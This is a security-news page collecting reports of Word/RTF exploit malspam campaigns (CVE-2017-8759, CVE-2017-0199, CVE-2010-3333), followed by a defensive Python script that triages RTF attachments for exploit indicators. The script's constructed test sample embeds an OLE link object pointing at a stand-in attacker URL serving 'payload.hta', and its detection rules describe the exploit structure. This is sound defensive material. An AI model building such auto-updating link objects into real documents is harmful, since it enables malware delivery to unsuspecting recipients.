New Microsoft Word zero day used in Russian-language spyware campaign, analysts say

A well-funded spy group appears to have recently acquired a highly sophisticated zero-day vulnerability and used it to deploy a remote access trojan against a Russian-speaking “entity,” according to evidence discovered by U.S. cybersecurity firm FireEye. FireEye researchers found the vulnerability, which is triggered through documents opened in recent versions of Microsoft Word (the flaw itself lies in the .NET Framework's SOAP WSDL parser), in July. The trojan, known as FinSpy, is made by the infamous surveillance technology firm FinFisher, a FireEye blog post says. The flaw remained unpatched until Tuesday afternoon, when Microsoft issued its monthly security update. The vulnerability, labeled CVE-2017-8759, was used as recently as late August to hack into systems, FireEye analyst Ben Read told CyberScoop. Analysts originally uncovered CVE-2017-8759 while examining a highly targeted phishing email written in Russian. The email carried an attachment that, when opened, exploited the flaw to download FinSpy from a server controlled by the attacker. […]

The post New Microsoft Word zero day used in Russian-language spyware campaign, analysts say appeared first on Cyberscoop.

Continue reading New Microsoft Word zero day used in Russian-language spyware campaign, analysts say

*CONFIRM ORDER AND REVISE INVOICE* malspam uses CVE-2017-0199 rtf exploit to deliver malware

An email with the subject of *CONFIRM ORDER AND REVISE INVOICE*, pretending to come from admin@ [random company], has a malicious Word doc attachment. This Word doc is actually an RTF file that uses what looks like the CVE-2017-0199 exploit, although this looks quite different to previous versions I have seen. At … Continue reading *CONFIRM ORDER AND REVISE INVOICE* malspam uses CVE-2017-0199 rtf exploit to deliver malware

Another fake eFax email delivers malware via ole rtf exploit

Another fake eFax email that I never got round to dealing with yesterday. Subject of eFax message from “116 – 921 – 1271” – 5 page(s), pretending to come from eFax Inc <noreply@efax.com>, with a zip attachment containing a malicious Word doc. They are using email addresses and subjects that will … Continue reading Another fake eFax email delivers malware via ole rtf exploit

fake bookatable.com and efaxcorporatexx.top malspam using CVE-2017-0199 exploits to deliver malware

Back to RTF files, this time using the CVE-2017-0199 vulnerability that was fixed in April 2017, with extra protections added by the May 2017 security updates. If you haven't got round to applying these essential patches yet, then go & do it NOW!!!! The malware payload is the same … Continue reading fake bookatable.com and efaxcorporatexx.top malspam using CVE-2017-0199 exploits to deliver malware

fake payment for message malspam using CVE-2017-0199 word /rtf embedded ole link exploit

An email with the subject of PAYMENT FOR YAREED [random names], coming from random names and email addresses, with a malicious Word doc attachment delivers some sort of malware via the CVE-2017-0199 Word/RTF embedded OLE link exploit. If you have updated Microsoft Word with the patches to protect yourself … Continue reading fake payment for message malspam using CVE-2017-0199 word /rtf embedded ole link exploit

new malware delivery method fast spreading probably Locky with office rtf files with individual passwords

Heads up everybody, we have a major change this morning in what I assume is a Locky or Dridex delivery system. The files come as RTF files, but each RTF file has an individual password. None of the online automatic …

Continue reading new malware delivery method fast spreading probably Locky with office rtf files with individual passwords

Please kindly find attached your swift copy of payment malspam with RTF exploit

An email with the subject of Fwd: Re: TT-USD78600.00, pretending to come from barat.mnupack@mnubd.com with a malicious Word doc attachment, is an attempt to exploit CVE-2010-3333, which is a buffer overflow in Word's handling of RTF files. Anybody using a modern version of Word, …

Continue reading Please kindly find attached your swift copy of payment malspam with RTF exploit
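Several of the posts above turn on the same triage question: the attachment is named as a Word doc but is really an RTF file, and the RTF carries either a linked OLE object that fetches a payload from a URL (the CVE-2017-0199 pattern in the CONFIRM ORDER, eFax, bookatable.com and PAYMENT posts) or the pFragments shape property (the CVE-2010-3333 pattern in the swift-copy post). The script below is an added example, not code from any of those posts or from the vendors they mention. It sniffs the real container format by magic bytes, decodes the hex in each `\objdata` group, and reports the indicators a mail-gateway or sandbox analyst would check first. The sample documents at the bottom are constructed for the example (the 192.0.2.10 address is a documentation range), the `triage` function and field names are this example's own, and the indicator matching is a heuristic, not a verdict.

```python
import binascii
import re

# Leading bytes of the document containers that turn up in these malspam runs.
MAGIC = {
    b"{\\rtf": "rtf",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole2",  # legacy binary .doc/.xls (compound file)
    b"PK\x03\x04": "ooxml-zip",                   # .docx/.xlsx (zip container)
}

# \objdata carries the OLE object as a run of hex digits; real samples often
# break the run with whitespace, so the character class admits it.
_OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
# "http://" or "https://" as UTF-16LE, the encoding the link moniker stores.
_UTF16_URL_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00")


def sniff_format(data):
    """Identify the container by magic bytes, ignoring the file name entirely."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def decode_objdata(rtf):
    """Yield the decoded bytes of every \\objdata hex blob in an RTF body."""
    for match in _OBJDATA_RE.finditer(rtf):
        hexdigits = re.sub(rb"\s+", b"", match.group(1))
        if len(hexdigits) % 2:          # tolerate a truncated trailing nibble
            hexdigits = hexdigits[:-1]
        try:
            yield binascii.unhexlify(hexdigits)
        except binascii.Error:
            continue


def rtf_indicators(rtf):
    """Collect control words and embedded-object contents worth a second look."""
    found = []
    if b"\\objautlink" in rtf:
        found.append("objautlink")      # linked (not embedded) OLE object
    if b"\\objupdate" in rtf:
        found.append("objupdate")       # link refreshed automatically on open
    if b"pFragments" in rtf:
        found.append("pFragments")      # shape property abused by CVE-2010-3333
    for blob in decode_objdata(rtf):
        if b"OLE2Link" in blob:
            found.append("OLE2Link")    # link moniker object seen in CVE-2017-0199 lures
        if _UTF16_URL_RE.search(blob) or b"http://" in blob or b"https://" in blob:
            found.append("url-in-objdata")
    return found


def triage(filename, data):
    """Triage one attachment: real format, extension mismatch, indicators, and
    the CVEs the indicator pattern is consistent with (heuristic, not proof)."""
    fmt = sniff_format(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    indicators = rtf_indicators(data) if fmt == "rtf" else []
    suspected = set()
    # A linked object that auto-updates and points at a URL is the
    # CVE-2017-0199 delivery pattern; a benign linked document can share
    # some of these markers, so this is a reason to detonate, not a verdict.
    if ({"objautlink", "objupdate"} & set(indicators)
            and {"OLE2Link", "url-in-objdata"} & set(indicators)):
        suspected.add("CVE-2017-0199")
    if "pFragments" in indicators:
        suspected.add("CVE-2010-3333")
    return {
        "format": fmt,
        "extension": ext,
        "extension_mismatch": fmt == "rtf" and ext in {"doc", "docx"},
        "indicators": indicators,
        "suspected": sorted(suspected),
    }


# Constructed samples (not real malware): an RTF delivered as "invoice.doc" whose
# linked object points at an attacker URL, an RTF carrying the pFragments
# property, and a plain RTF with no object at all.
_LINK_OBJECT = (b"OLE2Link" + b"\x00" * 8
                + "http://192.0.2.10/payload.hta".encode("utf-16-le") + b"\x00\x00")
SAMPLE_OLE_LINK_RTF = (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\objw1\\objh1"
                       b"{\\*\\objclass Word.Document.8}"
                       b"{\\*\\objdata " + binascii.hexlify(_LINK_OBJECT) + b"}}}")
SAMPLE_PFRAGMENTS_RTF = (b"{\\rtf1{\\shp{\\*\\shpinst{\\sp{\\sn pFragments}"
                         b"{\\sv 1;1;11111111}}}}}")
SAMPLE_BENIGN_RTF = b"{\\rtf1\\ansi Hello}"

if __name__ == "__main__":
    for name, blob in [("invoice.doc", SAMPLE_OLE_LINK_RTF),
                       ("swift_copy.doc", SAMPLE_PFRAGMENTS_RTF),
                       ("notes.rtf", SAMPLE_BENIGN_RTF)]:
        print(name, triage(name, blob))
```

Run it on a quarantined attachment with `triage(name, open(path, "rb").read())`. The format check alone catches the ".doc that is really RTF" trick every one of these posts describes; the indicator list is what to hand to the sandbox or to a YARA rule, and an `extension_mismatch` with an empty indicator list still deserves a look, because obfuscated RTF (control words split into the hex run, `\bin` data, nested groups) will defeat this simple parser.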